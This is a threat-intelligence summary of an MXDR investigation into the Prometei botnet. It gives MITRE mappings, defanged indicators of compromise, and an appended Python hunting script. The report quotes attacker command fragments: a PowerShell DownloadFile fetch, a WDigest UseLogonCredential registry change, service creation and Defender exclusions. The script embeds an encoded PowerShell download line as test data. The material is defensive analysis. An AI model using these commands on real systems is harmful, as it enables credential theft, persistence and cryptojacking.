“Unveiling Prometei: Insights from Our MXDR Analysis”

A Managed Extended Detection and Response (MXDR) analysis of the Prometei botnet shows it spreads via brute force and known RDP/SMB/Exchange vulnerabilities, then installs components for credential theft, persistence, and Monero mining. The report details file names, IPs, DGA domains, download URLs, and commands used by Prometei, and highlights how Trend Vision One aided detection and response. #Prometei #TrendVisionOne

Keypoints

  • Prometei has infected over 10,000 systems worldwide and spreads through targeted brute-force and exploitation of vulnerabilities such as BlueKeep and Exchange CVEs.
  • The botnet uses PowerShell, Base64-encoded payloads, and XOR-decrypted downloads to evade detection and fetch additional modules.
  • Credential theft is performed by enabling WDigest (UseLogonCredential) and using a custom Mimikatz-like component (miwalk.exe) to dump credentials to ssldata2.dll.
  • Prometei establishes persistence by creating services (UPlugPlay, KtmRmSvc), adding firewall rules, and installing a bundled Apache/PHP web shell for remote control.
  • Lateral movement and remote execution leverage WMI, custom .NET loaders (nethelper), SSH spreaders (windrlver.exe), and RDP automation with .cpass files.
  • The botnet runs a Monero miner (SearchIndexer.exe using XMRig 6.18.0) and connects to mining pools and C2 servers via HTTP/S, DGA domains, and Tor .onion addresses.
  • MXDR tooling (Trend Vision One) enabled proactive detection, live response actions, and retrieval of artifacts such as AppServ180.zip for analysis.

MITRE Techniques

  • [T1078] Valid Accounts – Used targeted brute force and credential harvesting to gain access (‘series of suspicious login attempts marked by multiple failed authentication requests’).
  • [T1110] Brute Force – Employed RDP/SMB brute-force attempts from IPs 196[.]7[.]210[.]6 and 196[.]7[.]209[.]178 (‘multiple failed authentication requests originating from two external IP addresses’).
  • [T1086] PowerShell – PowerShell scripts were used for downloading, decoding, extracting, and executing payloads (‘powershell … (New-Object Net.WebClient).DownloadFile(…)’).
  • [T1203] Exploitation for Client Execution – Exploited vulnerabilities (BlueKeep, Exchange CVEs) to execute payloads and propagate (‘spreads by exploiting vulnerabilities like BlueKeep and Microsoft Exchange Server vulnerabilities’).
  • [T1547] Boot or Logon Autostart Execution – Created services and registry entries to persist across reboots (‘sc create UPlugPlay … start= auto’ and ‘reg add … UPlugPlay’).
  • [T1547.001] Registry Run Keys / Startup Folder – Added registry entries and service ImagePath changes to ensure autostart (‘reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay” /v ImagePath …’).
  • [T1068] Exploitation of Vulnerability – Leveraged known vulnerabilities for privilege escalation and broader compromise (‘leveraged vulnerabilities for privilege escalation’).
  • [T1003] OS Credential Dumping – Harvested credentials and stored them for lateral use (‘miwalk.exe harvested credentials from compromised machines and dumped them into C:\Windows\dell\ssldata2.dll’).
  • [T1003.001] LSASS Memory – Re-enabled plaintext storage via WDigest to facilitate credential dumping (‘reg add “…WDigest” /v UseLogonCredential /d 1’).
  • [T1021] Remote Services – Used remote service mechanisms to move laterally and execute commands (‘Used WMI for lateral movement’ and ‘WMI Provider Host (wmiprvse.exe) was used’).
  • [T1021.001] Remote Services: SMB/Windows Admin Shares or WMI – Remote execution and file propagation used WMI and SMB (writing to C:\Windows\dell and similar directories) (‘WMI Provider Host … presence as a parent process indicates that the scripts were initiated by a WMI operation’).
  • [T1071] Application Layer Protocol – Communicated with C2 and download servers over HTTP/S and Tor (‘sqhost.exe connects to the external IP address 88.198.246[.]242 to download prometei.cgi’ and ‘.onion C2 URLs’).
  • [T1071.001] Web Protocols – Used HTTP/S and Stratum protocol to fetch payloads and connect miners (‘(New-Object Net.WebClient).DownloadFile(…)’ and miner connecting with stratum+tcp://…).
  • [T1041] Exfiltration Over C2 Channel – Used C2 channels and web shells for data transfer and possible exfiltration (‘Used C&C channels for data exfiltration’ and web shell upload/command features).

Indicators of Compromise

  • [IP Addresses] observed as attack sources and C2/download hosts – 196[.]7[.]210[.]6 and 196[.]7[.]209[.]178 (brute-force sources), 88[.]198[.]246[.]242 (C2), plus 103[.]41[.]204[.]104 and 103[.]40[.]123[.]34 (download hosts).
  • [Domains / DGA] C2 and DGA domains used by the botnet – xinchaocacebd[.]com, xinchaobjcebk[.]com, and p2.feefreepool[.]net (mining pool), and dynamically generated xincha* domains.
  • [File names] dropped or executed on disk – sqhost.exe / zsvc.exe (main bot), miwalk.exe (credential dumper), SearchIndexer.exe (miner), and AppServ180.zip (bundled Apache/PHP web shell).
  • [File hashes] integrity checks for downloaded archives – SHA-1 examples: 9280B1466527CB5B22C77C6CF42A3085A68DD326 (srch.7z), 20FEA1314DBED552D5FEDEE096E2050369172EE1 (7z.exe), and others.
  • [Onion / Tor] hidden-service C2 endpoints – https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi (Tor C2 .onion URL).

In this MXDR investigation aided by Trend Vision One, analysts traced how the Prometei botnet infiltrated an environment and established a persistent, multi-component foothold focused on credential theft and cryptocurrency mining. The intrusion began with targeted brute-force login attempts from external IPs tied to known Prometei infrastructure; after several failed logins the attackers achieved a successful authentication and used RDP/SMB access and known vulnerabilities such as BlueKeep (CVE-2019-0708) and Microsoft Exchange CVEs to move further into the network. The initial compromise dropped installer artifacts into Windows directories (for example, C:\Windows\dell and C:\Windows), including zsvc.exe, sqhost.exe, and the archives updates1.7z/updates2.7z, which were extracted with a bundled 7z.exe.

The main installer binary (zsvc.exe / sqhost.exe, observed as a UPX-packed and custom-packed sample) unpacks its bot code if it finds a supporting file (mshlpda32.dll); otherwise it performs decoy reconnaissance such as writing systeminfo output to C:\Windows\Temp\setup_gitlog.txt before terminating. When installing with administrative privileges the malware creates a C:\Windows\dell folder, writes registry values under HKLM\SOFTWARE\Intel\Support (MachineKeyId, EncryptedMachineKeyId, CommId), and either reuses or replaces existing values found under HKLM\SOFTWARE\Microsoft\Fax for configuration persistence. Installation actions include copying itself to C:\Windows, deleting and recreating a UPlugPlay service configured to run sqhost.exe with the “Dcomsvc” parameter, setting that service to auto-start, renaming zsvc.exe to sqhost.exe, and adding firewall rules that allow sqhost.exe network traffic under the guise “Secure Socket Tunneling Protocol (HTTP)”. If administrative rights are not available it instead copies itself to %AppData%\intel\roaming and adds an HKCU Run entry to persist per user.

Sqhost.exe functions as the primary bot binary: it connects to hardcoded C2 endpoints (HTTP, I2P, and .onion), verifies downloaded components with SHA-1 checksums, and uses PowerShell to download and extract additional modules such as 7z32.dll/7z32.exe and std.7z from hosts like 103[.]41[.]204[.]104. The malware also implements an XOR-based decryption routine for certain downloads (for example, saving a downloaded file to C:\Windows\zsvc.exe and then applying a byte-wise XOR/decrement loop before executing the result). A built-in command set supports operations such as setting C2 servers, updating, fetching files (wget/xwget), starting and stopping mining (start_mining / stop_mining), and executing arbitrary commands or files (exec / call).

Credential theft is a central capability. Operators re-enable plaintext credential caching by adding the UseLogonCredential DWORD to the WDigest registry key, then run a customized Mimikatz-like component (miwalk.exe) that extracts credentials and dumps them into C:\Windows\dell\ssldata2.dll. These stolen credentials are then used for lateral movement. The bot uses WMI (wmiprvse.exe as the parent process) and .NET-based lateral modules (nethelper*.exe) to search for SQL servers and other network targets, attempting to deploy sqhost.exe onto newly discovered hosts. For RDP targeting the threat uses components such as rdpcIip.exe and a Socks.exe module that processes .cpass files containing candidate credentials and records successful logins in .cpass_good files.

To evade detection the actors add Windows Defender exclusions for directories such as C:\Windows and C:\Windows\Dell via Add-MpPreference PowerShell commands, and drop Base64-encoded payload fragments to disk (files with .b64 extensions) that PowerShell later decodes into executables or DLLs. The malware also routinely checks SHA-1 hashes of downloaded tools and uses a password-protected 7z extraction step (password observed as “horhor123”) to unpack payloads like srch.7z, which contains the mining binary SearchIndexer.exe.

Cryptojacking is a prominent post-compromise activity: SearchIndexer.exe masquerades as a legitimate Windows service and runs XMRig (version 6.18.0) to mine Monero, connecting to mining pools and stratum endpoints such as stratum+tcp://145[.]239[.]200[.]92:3333, 88[.]198[.]246[.]242:80, and others. The miner configuration is delivered from the C2 as a Base64-encoded desktop.dat that decodes into a stratum connection string and mining parameters.

Command-and-control in Prometei is resilient and multi-layered. The bot uses a Domain Generation Algorithm (DGA) to create numerous xincha* domains as fallback C2, performs DNS lookups against 8[.]8[.]8[.]8 to resolve the generated names, hosts payloads on multiple IPs (e.g., 103[.]40[.]123[.]34, 103[.]41[.]204[.]104), and retains the option of using Tor hidden services such as https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi. The operators can deploy a portable Apache + PHP stack (AppServ180.zip) to C:\ProgramData\Microsoft\AppServ, which exposes a web shell (ssimple.php renamed to Shell-{random}.php) enabling command execution and file upload. The attackers hide the web server by creating a service KtmRmSvc pointing at taskhost.exe in the Apache2.2 bin folder, adding firewall rules, and copying php.ini into C:\Windows to blend in with legitimate files.

Additional propagation techniques observed include SSH-based spreader modules (windrlver.exe) that initiate SSH sessions to external hosts and establish SSH tunnels or transfers, a Tor relay component (smcard.exe) that launches a local SOCKS proxy, and nethelper assemblies that target database servers and install the bot across hosts. The bot’s components perform system reconnaissance (wmic queries, ver, last boot time) and continually await commands from the C2. Notable files and artifacts seen on disk include C:\Windows\uplugplay, C:\Windows\netwalker, C:\Windows\updates1.7z, C:\Windows\mshlpda32.dll, C:\Windows\7z.exe, and executables such as sqhost.exe, miWalk64.exe/miWalk32.exe, windrlver.exe, and SearchIndexer.exe.

From a tooling and response perspective, Trend Vision One’s MXDR capabilities enabled investigators to detect sqhost.exe activity, retrieve AppServ180.zip for static analysis, and correlate events across endpoints to reduce dwell time. The collected evidence shows Prometei is modular, self-updating, and designed to adapt: it checks for existing installations, uses multiple C2 channels (HTTP, I2P, Tor), verifies download integrity, and applies obfuscation techniques like Base64 and custom XOR decryption. The actors behind Prometei are not definitively identified, but language artifacts and behavior (avoidance of Russian-language accounts and references to the Russian-derived name “Prometei”) suggest a Russian-speaking origin.

In conclusion, the Prometei campaign demonstrates an advanced, multi-stage threat that combines brute-force access, vulnerability exploitation, credential harvesting, lateral movement, persistence mechanisms, web shells, Tor-based C2, and cryptojacking. Defenders should prioritize timely patching of RDP/SMB and Exchange vulnerabilities, monitor for the listed file names, IPs, domains, and registry modifications (especially WDigest UseLogonCredential), hunt for suspicious PowerShell Base64 activity and service creation, and employ MXDR capabilities to correlate indicators and respond quickly. The investigation underscores how incident response, threat intelligence, and extended detection tooling together reduce an adversary’s window of operation and help contain complex botnet campaigns.
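As an added illustration of the hunts recommended above (this is not code from the report or from Trend Micro), the following Python script applies the WDigest UseLogonCredential, auto-start service, Defender-exclusion and encoded-PowerShell checks to a handful of constructed telemetry records; the pipe-separated record layout, the host name and the file paths in the samples are assumptions made for the example.

```python
import base64
import re

# Constructed sample telemetry (not from the report) as (source, detail) records
# in a simplified "field|field|field" layout; the host name and paths are made up.
SAMPLE_EVENTS = [
    ("registry", r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest|UseLogonCredential|1"),
    ("service", r"UPlugPlay|C:\Windows\sqhost.exe Dcomsvc|auto"),
    ("service", r"Spooler|C:\Windows\System32\spoolsv.exe|auto"),
    ("process", r"powershell.exe Add-MpPreference -ExclusionPath C:\Windows"),
    ("process", "powershell.exe -enc " + base64.b64encode(
        "(New-Object Net.WebClient).DownloadFile('http://host.invalid/std.7z','C:\\Windows\\std.7z')"
        .encode("utf-16le")).decode()),
    ("process", r"notepad.exe C:\Users\alice\notes.txt"),
]
SUSPICIOUS_SERVICES = {"uplugplay", "ktmrmsvc"}  # service names named in the report

def decode_encoded_command(cmdline):
    """Return the -enc/-EncodedCommand payload (Base64 of UTF-16LE) decoded, or ''."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # malformed or truncated payload
        return ""

def hunt(events):
    """Apply the hunting rules to the records; return (rule, evidence) findings."""
    findings = []
    for source, detail in events:
        if source == "registry":
            key, name, value = detail.rsplit("|", 2)
            if key.lower().endswith(r"\wdigest") and name.lower() == "uselogoncredential" and value == "1":
                findings.append(("wdigest_plaintext_enabled", detail))
        elif source == "service":
            name, image, start = detail.split("|", 2)
            image_dir = image.lower().rsplit("\\", 1)[0]
            # UPlugPlay runs sqhost.exe straight from C:\Windows rather than System32.
            if name.lower() in SUSPICIOUS_SERVICES or (start == "auto" and image_dir == r"c:\windows"):
                findings.append(("suspicious_autostart_service", detail))
        elif source == "process":
            low = detail.lower()
            if "add-mppreference" in low and "-exclusionpath" in low and r"c:\windows" in low:
                findings.append(("defender_exclusion_windows_dir", detail))
            decoded = decode_encoded_command(detail)
            if re.search(r"downloadfile|stratum\+tcp", decoded, re.I):
                findings.append(("encoded_powershell_download", decoded))
    return findings
```

Calling hunt(SAMPLE_EVENTS) yields four findings, one per rule, while the Spooler service and the notepad process pass unflagged.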

Read more: https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html